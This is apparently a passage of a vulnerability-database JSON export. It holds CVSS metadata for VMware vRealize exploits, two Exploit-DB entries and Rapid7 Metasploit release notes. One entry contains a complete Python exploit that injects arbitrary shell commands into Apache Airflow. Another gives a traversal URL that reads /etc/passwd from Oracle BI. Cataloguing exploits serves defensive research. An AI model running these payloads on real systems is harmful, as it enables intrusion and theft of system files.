"userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-02T21:14:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-10-24T06:02:36", "id": "D5702470-2A4B-5116-9B9F-4001BDD6935C", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "## Impacted Products\r\n\r\n- VMware vRealize Operations 8.3.0\u30018.2.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T15:40:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-11-08T08:21:55", "id": "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T19:57:08", "description": "# REALITY_SMASHER\nvRealize RCE + Privesc (CVE-2021-21975, CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:24:38", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2022-02-19T17:06:47", "id": "911A7F63-1DBC-54A3-820C-F8F19E006338", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T14:28:37", "description": "<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-16T11:56:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-03-16T13:53:28", "id": "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-25T19:01:57", "description": "## 0x01 \u6ce8\n\u8be5\u9879\u76ee\u4ec5\u4f9b\u5408\u6cd5\u7684\u6e17\u900f\u6d4b\u8bd5\u4ee5\u53ca\u7231\u597d\u8005\u53c2\u8003\u5b66\u4e60\uff0c\u8bf7\u5404\u4f4d\u9075\u5b88\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u7f51\u7edc\u5b89\u5168\u6cd5\u300b\u4ee5\u53ca\u76f8\u5e94\u5730\u65b9\u7684\u6cd5\u5f8b\uff0c\u7981\u6b62\u4f7f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-01T01:14:20", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-22005", "CVE-2021-26295"], "modified": "2022-03-25T11:15:15", "id": "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "exploitdb": [{"lastseen": "2023-06-05T14:52:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-02T00:00:00", "type": "exploitdb", "title": "Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11978", "2020-13927", "CVE-2020-11978", "CVE-2020-13927"], "modified": "2021-06-02T00:00:00", "id": "EDB-ID:49927", "href": "https://www.exploit-db.com/exploits/49927", "sourceData": "# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution\n# Date: 2021-06-02\n# Exploit Author: Pepe Berba\n# Vendor Homepage: https://airflow.apache.org/\n# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html\n# Version: <= 1.10.10\n# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)\n# CVE : CVE-2020-11978\n#\n# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow\n# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.\n# Together, potentially allows unauthenticated RCE to Airflow\n#\n# Repo: https://github.com/pberba/CVE-2020-11978\n# More information can be found here:\n# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E\n# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E\n#\n# Remediation:\n# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.\n# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.\n#\n# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 \"touch test\"\n\nimport argparse\nimport requests\nimport sys\nimport time\n\ndef create_dag(url, cmd):\n\tprint('[+] Checking if Airflow Experimental REST API is accessible...')\n\tcheck = requests.get('{}/api/experimental/test'.format(url))\n\n\tif check.status_code == 200:\n\t\tprint('[+] /api/experimental/test returned 200' )\n\telse:\n\t\tprint('[!] /api/experimental/test returned {}'.format(check.status_code))\n\t\tprint('[!] Airflow Experimental REST API not be accessible')\n\t\tsys.exit(1)\n\n\tcheck_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))\n\tif check_task.status_code != 200:\n\t\tprint('[!] Failed to find the example_trigger_target_dag.bash_task')\n\t\tprint('[!] Host isn\\'t vunerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\telif 'dag_run' in check_task.json()['env']:\n\t\tprint('[!] example_trigger_target_dag.bash_task is patched')\n\t\tprint('[!] Host isn\\'t vunerable to CVE-2020-11978')\n\t\tsys.exit(1)\n\tprint('[+] example_trigger_target_dag.bash_task is vulnerable')\n\n\tunpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))\n\tif unpause.status_code != 200:\n\t\tprint('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')\n\t\tsys.exit(1)\n\telse:\n\t\tprint('[+] example_trigger_target_dag was enabled')\n\n\tprint('[+] Creating new DAG...')\n\tres = requests.post(\n\t '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),\n\t json={\n\t 'conf': {\n\t 'message': '\"; {} #'.format(cmd)\n\t }\n\t }\n\t)\n\n\tif res.status_code == 200:\n\t\tprint('[+] Successfully created DAG')\n\t\tprint('[+] \"{}\"'.format(res.json()['message']))\n\telse:\n\t\tprint('[!] Failed to create DAG')\n\t\tsys.exit(1)\n\n\twait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(\n\t\turl = url,\n\t\texecution_date=res.json()['execution_date']\n\t)\n\n\tstart_time = time.time()\n\tprint('[.] Waiting for the scheduler to run the DAG... This might take a minute.')\n\tprint('[.] If the bash task is never queued, then the scheduler might not be running.')\n\twhile True:\n\t\ttime.sleep(10)\n\t\tres = requests.get(wait_url)\n\t\tstatus = res.json()['state']\n\t\tif status == 'queued':\n\t\t\tprint('[.] Bash task queued...')\n\t\telif status == 'running':\n\t\t\tprint('[+] Bash task running...')\n\t\telif status == 'success':\n\t\t\tprint('[+] Bash task successfully ran')\n\t\t\tbreak\n\t\telif status == 'None':\n\t\t\tprint('[-] Bash task is not yet queued...'.format(status))\n\t\telse:\n\t\t\tprint('[!] Bash task was {}'.format(status))\n\t\t\tsys.exit(1)\n\n\treturn 0\n\n\ndef main():\n\targ_parser = argparse.ArgumentParser()\n\targ_parser.add_argument('url', type=str, help=\"Base URL for Airflow\")\n\targ_parser.add_argument('command', type=str)\n\targs = arg_parser.parse_args()\n\n\tcreate_dag(\n\t\targs.url,\n\t\targs.command\n\t)\n\nif __name__ == '__main__':\n\tmain()", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/multiple/webapps/49927.py", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T14:54:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-28T00:00:00", "type": "exploitdb", "title": "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-14864", "CVE-2020-14864"], "modified": "2020-10-28T00:00:00", "id": "EDB-ID:48964", "href": "https://www.exploit-db.com/exploits/48964", "sourceData": "# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion\n# Date: 2020-10-27\n# Exploit Author: Ivo Palazzolo (@palaziv)\n# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html\n# Vendor Homepage: https://www.oracle.com\n# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html\n# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0\n# Tested on: SUSE Linux Enterprise Server\n# CVE: CVE-2020-14864\n\n# Description\nA Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files.\n\n# PoC\nhttps://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/webapps/48964.txt", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "rapid7blog": [{"lastseen": "2023-02-10T20:40:56", "description": "## Taking a stroll down memory lane (Tomcat Init Script Privilege Escalation)\n\n\n\nDo you remember the issue with Tomcat init script that was originally discovered by [Dawid Golunski](<https://twitter.com/dawid_golunski?lang=en>) back in 2016 that led to privilege escalation? This week's Metasploit release includes an exploit module for `CVE-2016-1240` by [h00die](<https://github.com/h00die>). This vulnerability allows any local users who already have tomcat accounts to perform privilege escalation and gain access to a target system as a root user. This exploit can be used against the following tomcat versions Tomcat 8 (8.0.36-2), Tomcat 7 (7.0.70-2) and Tomcat 6 (6.0.45+dfsg-1~deb8u1).\n\n## Lenovo Diagnostics Driver IOCTL memmove\n\nOur own [Jack Heysel](<https://github.com/jheysel-r7>) contributed an exploit module for `CVE-2022-3699` using the proof of concept created by [alfarom256](<https://github.com/alfarom256>). A vulnerability within Lenovo Diagnostics Driver due to incorrect access control allows low-privileged users to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.\n\n## New module content (8)\n\n### Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Execution\n\nAuthor: Matthew Mathur \nType: Exploit \nPull request: [#17494](<https://github.com/rapid7/metasploit-framework/pull/17494>) contributed by [k0pak4](<https://github.com/k0pak4>) \nAttackerKB reference: [CVE-2021-25298](<https://attackerkb.com/topics/c1866NX9mx/cve-2021-25298?referrer=blog>)\n\nDescription: A new authenticated RCE module for NagiosXI has been added which exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298 to get a shell as the `apache` user on NagiosXI devices running version 5.5.6 to 5.7.5 inclusive.\n\n### F5 Big-IP Create Admin User\n\nAuthor: Ron Bowes \nType: Exploit \nPull request: [#17392](<https://github.com/rapid7/metasploit-framework/pull/17392>) contributed by [rbowes-r7](<https://github.com/rbowes-r7>)\n\nDescription: This PR adds a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account.\n\n### Apache Tomcat on Ubuntu Log Init Privilege Escalation\n\nAuthors: Dawid Golunski and h00die \nType: Exploit \nPull request: [#17483](<https://github.com/rapid7/metasploit-framework/pull/17483>) contributed by [h00die](<https://github.com/h00die>) \nAttackerKB reference: [CVE-2016-1240](<https://attackerkb.com/topics/fulwOZwkR6/cve-2016-1240?referrer=blog>)\n\nDescription: Adds a new `exploit/linux/local/tomcat_ubuntu_log_init_priv_esc` module for CVE-2016-1240 targetting Tomcat (6, 7, 8). By default repositories on Debian-based distributions (including Debian, Ubuntu etc.) provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account (for example, by exploiting an RCE vulnerability in a java web application hosted on Tomcat, uploading a webshell etc.) to escalate their privileges from tomcat user to root and fully compromise the target system.\n\n### Fortra GoAnywhere MFT Unsafe Deserialization RCE\n\nAuthor: Ron Bowes \nType: Exploit \nPull request: [#17607](<https://github.com/rapid7/metasploit-framework/pull/17607>) contributed by [rbowes-r7](<https://github.com/rbowes-r7>) \nAttackerKB reference: [CVE-2023-0669](<https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669?referrer=blog>)\n\nDescription: This PR adds a module that exploits CVE-2023-0669, which is an object deserialization vulnerability in Fortra GoAnywhere MFT.\n\n### ManageEngine ADSelfService Plus Unauthenticated SAML RCE\n\nAuthors: Christophe De La Fuente, Khoa Dinh, and horizon3ai \nType: Exploit \nPull request: [#17556](<https://github.com/rapid7/metasploit-framework/pull/17556>) contributed by [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \nAttackerKB reference: [CVE-2022-47966](<https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966?referrer=blog>)\n\nDescription: This PR adds an exploit that uses an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ADSelfService Plus versions 6210 and below (<https://github.com/advisories/GHSA-4w3v-83v8-mg94>).\n\n### ManageEngine ServiceDesk Plus Unauthenticated SAML RCE\n\nAuthors: Christophe De La Fuente, Khoa Dinh, and horizon3ai \nType: Exploit \nPull request: [#17527](<https://github.com/rapid7/metasploit-framework/pull/17527>) contributed by [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \nAttackerKB reference: [CVE-2022-47966](<https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966?referrer=blog>)\n\nDescription: This adds an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below. (<https://github.com/advisories/GHSA-4w3v-83v8-mg94>).\n\n### ManageEngine Endpoint Central Unauthenticated SAML RCE\n\nAuthors: Christophe De La Fuente, Khoa Dinh, h00die-gr3y, and horizon3ai \nType: Exploit \nPull request: [#17567](<https://github.com/rapid7/metasploit-framework/pull/17567>) contributed by [h00die-gr3y](<https://github.com/h00die-gr3y>) \nAttackerKB reference: [CVE-2022-47966](<https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966?referrer=blog>)\n\nDescription: This adds an exploit targeting CVE-2022-47966, an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10 and below. See <https://github.com/advisories/GHSA-mqq7-v29v-25f6> and [ManageEngine security advisory](<https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html>).\n\n### Lenovo Diagnostics Driver IOCTL memmove\n\nAuthors: alfarom256 and jheysel-r7 \nType: Exploit \nPull request: [#17371](<https://github.com/rapid7/metasploit-framework/pull/17371>) contributed by [jheysel-r7](<https://github.com/jheysel-r7>) \nAttackerKB reference: [CVE-2022-3699](<https://attackerkb.com/topics/v6avP6vl1U/cve-2022-3699?referrer=blog>)\n\nDescription: This PR adds a module that makes use of incorrect access control for the Lenovo Diagnostics Driver allowing a low-privileged user the ability to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.\n\n## Enhancements and features (3)\n\n * [#17597](<https://github.com/rapid7/metasploit-framework/pull/17597>) from [bcoles](<https://github.com/bcoles>) \\- Fix notes for SideEffects and Reliability in the `auxiliary/dos/mirageos/qubes_mirage_firewall_dos` module.\n * [#17603](<https://github.com/rapid7/metasploit-framework/pull/17603>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Updates `admin/kerberos/inspect_ticket` to show the UPN and DNS Information within a decrypted PAC.\n * [#17615](<https://github.com/rapid7/metasploit-framework/pull/17615>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds missing module notes for stability, reliability, and side effects to several modules.\n\n## Bugs fixed (2)\n\n * [#17591](<https://github.com/rapid7/metasploit-framework/pull/17591>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed in metasm_shell and nasm_shell whereby the shells were using readline but the dependency wasn't correctly imported. This has since been fixed and improved validation has been added.\n * [#17592](<https://github.com/rapid7/metasploit-framework/pull/17592>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed in the `bypassuac_injection_winsxs` module whereby a string was not properly being treated as being NULL terminated. Additionally, the definitions of the `FindFirstFileA` and `FindFirstFileW` functions have been corrected so that they work on x64 systems.\n\n## Documentation added (3)\n\n * [#17398](<https://github.com/rapid7/metasploit-framework/pull/17398>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Adds additional details on using command stagers.\n * [#17587](<https://github.com/rapid7/metasploit-framework/pull/17587>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR updates docs.metasploit.com to use the latest ruby conventions.\n * [#17595](<https://github.com/rapid7/metasploit-framework/pull/17595>) from [mkonda](<https://github.com/mkonda>) \\- Updates the documentation on debugging dead Meterpreter sessions to use the correct option name `ReverseListenerBindAddress`.\n\nYou can always find more documentation on our docsite at [docs.metasploit.com](<https://docs.metasploit.com/>).\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.3.1...6.3.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222023-02-02T12%3A03%3A09-06%3A00..2023-02-09T11%3A57%3A08-06%3A00%22>)\n * [Full diff 6.3.1...6.3.2](<https://github.com/rapid7/metasploit-framework/compare/6.3.1...6.3.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-10T19:39:42", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1240", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2022-3699", "CVE-2022-47966", "CVE-2023-0669"], "modified": "2023-02-10T19:39:42", "id": "RAPID7BLOG:3E54ECACB70B1C9E4DF1458D3CABE899", "href": "https://blog.rapid7.com/2023/02/10/metasploit-weekly-wrap-up-192/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T18:51:30", "description": "## Operations shell\n\n\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, therefore databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database related modules!\n\nThe first, an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. The second, a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>) enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>) which is a hardcoded SSH password in Micro Focus Operations Bridge Manager instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits 